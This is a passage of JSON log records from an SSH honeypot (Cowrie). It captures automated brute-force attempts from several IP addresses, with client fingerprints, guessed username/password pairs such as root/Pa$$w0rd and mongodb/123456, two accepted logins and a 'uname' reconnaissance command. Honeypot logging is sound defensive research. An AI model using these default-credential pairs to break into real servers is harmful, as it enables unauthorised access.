2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:08:38.115708Z","src_ip":"212.227.125.160","session":"2d4380d16747"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:08:40.164846Z","src_ip":"212.227.125.160","session":"2d4380d16747"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:08:41.602447Z","src_ip":"212.227.125.160","session":"2d4380d16747"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34834,"dst_ip":"1.2.3.4","dst_port":22,"session":"a692348597fb","protocol":"ssh","message":"New connection: 212.227.125.160:34834 (1.2.3.4:22) [session: a692348597fb]","sensor":"my-vps","timestamp":"2025-08-31T03:08:44.020061Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":32876,"dst_ip":"1.2.3.4","dst_port":22,"session":"384cb78069d9","protocol":"ssh","message":"New connection: 41.226.27.251:32876 (1.2.3.4:22) [session: 384cb78069d9]","sensor":"my-vps","timestamp":"2025-08-31T03:08:46.855220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:08:46.861139Z","src_ip":"41.226.27.251","session":"384cb78069d9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:08:46.899165Z","src_ip":"41.226.27.251","session":"384cb78069d9"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-31T03:08:47.074575Z","src_ip":"41.226.27.251","session":"384cb78069d9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:08:48.332477Z","src_ip":"41.226.27.251","session":"384cb78069d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54448,"dst_ip":"1.2.3.4","dst_port":22,"session":"65f1ee4edfee","protocol":"ssh","message":"New connection: 212.227.125.160:54448 (1.2.3.4:22) [session: 65f1ee4edfee]","sensor":"my-vps","timestamp":"2025-08-31T03:08:54.764061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:08:54.764981Z","src_ip":"212.227.125.160","session":"65f1ee4edfee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:08:55.020282Z","src_ip":"212.227.125.160","session":"65f1ee4edfee"}
{"eventid":"cowrie.login.failed","username":"username","password":"username@2025","message":"login attempt [username/username@2025] failed","sensor":"my-vps","timestamp":"2025-08-31T03:08:56.091534Z","src_ip":"212.227.125.160","session":"65f1ee4edfee"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:08:57.354384Z","src_ip":"212.227.125.160","session":"65f1ee4edfee"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:09:04.601368Z","src_ip":"212.227.235.229","session":"8168c657830d"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":34348,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a8343ba07ad","protocol":"ssh","message":"New connection: 41.226.27.251:34348 (1.2.3.4:22) [session: 8a8343ba07ad]","sensor":"my-vps","timestamp":"2025-08-31T03:09:07.458229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:09:07.474234Z","src_ip":"41.226.27.251","session":"8a8343ba07ad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:09:07.502004Z","src_ip":"41.226.27.251","session":"8a8343ba07ad"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:09:07.676367Z","src_ip":"41.226.27.251","session":"8a8343ba07ad"}
{"eventid":"cowrie.session.closed","duration":"24.0","message":"Connection lost after 24.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:09:08.011380Z","src_ip":"212.227.125.160","session":"a692348597fb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60742,"dst_ip":"1.2.3.4","dst_port":22,"session":"5176864a62c5","protocol":"ssh","message":"New connection: 217.72.205.35:60742 (1.2.3.4:22) [session: 5176864a62c5]","sensor":"my-vps","timestamp":"2025-08-31T03:09:08.507103Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:09:08.509043Z","src_ip":"217.72.205.35","session":"5176864a62c5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:09:08.963026Z","src_ip":"41.226.27.251","session":"8a8343ba07ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57012,"dst_ip":"1.2.3.4","dst_port":22,"session":"803256986d92","protocol":"ssh","message":"New connection: 212.227.235.229:57012 (1.2.3.4:22) [session: 803256986d92]","sensor":"my-vps","timestamp":"2025-08-31T03:09:15.163333Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53414,"dst_ip":"1.2.3.4","dst_port":22,"session":"da443791eb56","protocol":"ssh","message":"New connection: 212.227.235.229:53414 (1.2.3.4:22) [session: da443791eb56]","sensor":"my-vps","timestamp":"2025-08-31T03:09:16.763441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:09:17.505130Z","src_ip":"212.227.235.229","session":"803256986d92"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:09:17.505860Z","src_ip":"212.227.235.229","session":"803256986d92"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:09:21.558175Z","src_ip":"212.227.235.229","session":"803256986d92"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:09:23.380972Z","src_ip":"212.227.235.229","session":"803256986d92"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":53726,"dst_ip":"1.2.3.4","dst_port":22,"session":"25d2f2648f4c","protocol":"ssh","message":"New connection: 41.226.27.251:53726 (1.2.3.4:22) [session: 25d2f2648f4c]","sensor":"my-vps","timestamp":"2025-08-31T03:09:27.978350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:09:27.991513Z","src_ip":"41.226.27.251","session":"25d2f2648f4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:09:28.023902Z","src_ip":"41.226.27.251","session":"25d2f2648f4c"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:09:28.204937Z","src_ip":"41.226.27.251","session":"25d2f2648f4c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:09:29.416727Z","src_ip":"41.226.27.251","session":"25d2f2648f4c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:09:33.976099Z","src_ip":"212.227.235.229","session":"da443791eb56"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:09:34.125702Z","src_ip":"212.227.235.229","session":"da443791eb56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47256,"dst_ip":"1.2.3.4","dst_port":22,"session":"f85891c9b669","protocol":"ssh","message":"New connection: 212.227.125.160:47256 (1.2.3.4:22) [session: f85891c9b669]","sensor":"my-vps","timestamp":"2025-08-31T03:09:36.907250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:09:37.310731Z","src_ip":"212.227.125.160","session":"f85891c9b669"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:09:37.311411Z","src_ip":"212.227.125.160","session":"f85891c9b669"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:09:39.241439Z","src_ip":"212.227.235.229","session":"8168c657830d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:09:39.242145Z","src_ip":"212.227.235.229","session":"8168c657830d"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:09:39.574099Z","src_ip":"212.227.125.160","session":"f85891c9b669"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:09:40.738691Z","src_ip":"212.227.125.160","session":"f85891c9b669"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60794,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2020671b9b4","protocol":"ssh","message":"New connection: 212.227.125.160:60794 (1.2.3.4:22) [session: a2020671b9b4]","sensor":"my-vps","timestamp":"2025-08-31T03:09:41.007464Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":35530,"dst_ip":"1.2.3.4","dst_port":22,"session":"42f4d102b6f0","protocol":"ssh","message":"New connection: 41.226.27.251:35530 (1.2.3.4:22) [session: 42f4d102b6f0]","sensor":"my-vps","timestamp":"2025-08-31T03:09:47.998312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:09:48.013650Z","src_ip":"41.226.27.251","session":"42f4d102b6f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:09:48.062225Z","src_ip":"41.226.27.251","session":"42f4d102b6f0"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:09:48.330901Z","src_ip":"41.226.27.251","session":"42f4d102b6f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:09:48.916440Z","src_ip":"41.226.27.251","session":"42f4d102b6f0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:09:48.917305Z","src_ip":"41.226.27.251","session":"42f4d102b6f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:09:48.967256Z","src_ip":"41.226.27.251","session":"42f4d102b6f0"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:09:48.968442Z","src_ip":"41.226.27.251","session":"42f4d102b6f0"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":42182,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5e250e6d020","protocol":"ssh","message":"New connection: 41.226.27.251:42182 (1.2.3.4:22) [session: a5e250e6d020]","sensor":"my-vps","timestamp":"2025-08-31T03:10:08.381438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:10:08.395860Z","src_ip":"41.226.27.251","session":"a5e250e6d020"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:10:08.426603Z","src_ip":"41.226.27.251","session":"a5e250e6d020"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:10:08.605961Z","src_ip":"41.226.27.251","session":"a5e250e6d020"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:09.781082Z","src_ip":"41.226.27.251","session":"a5e250e6d020"}
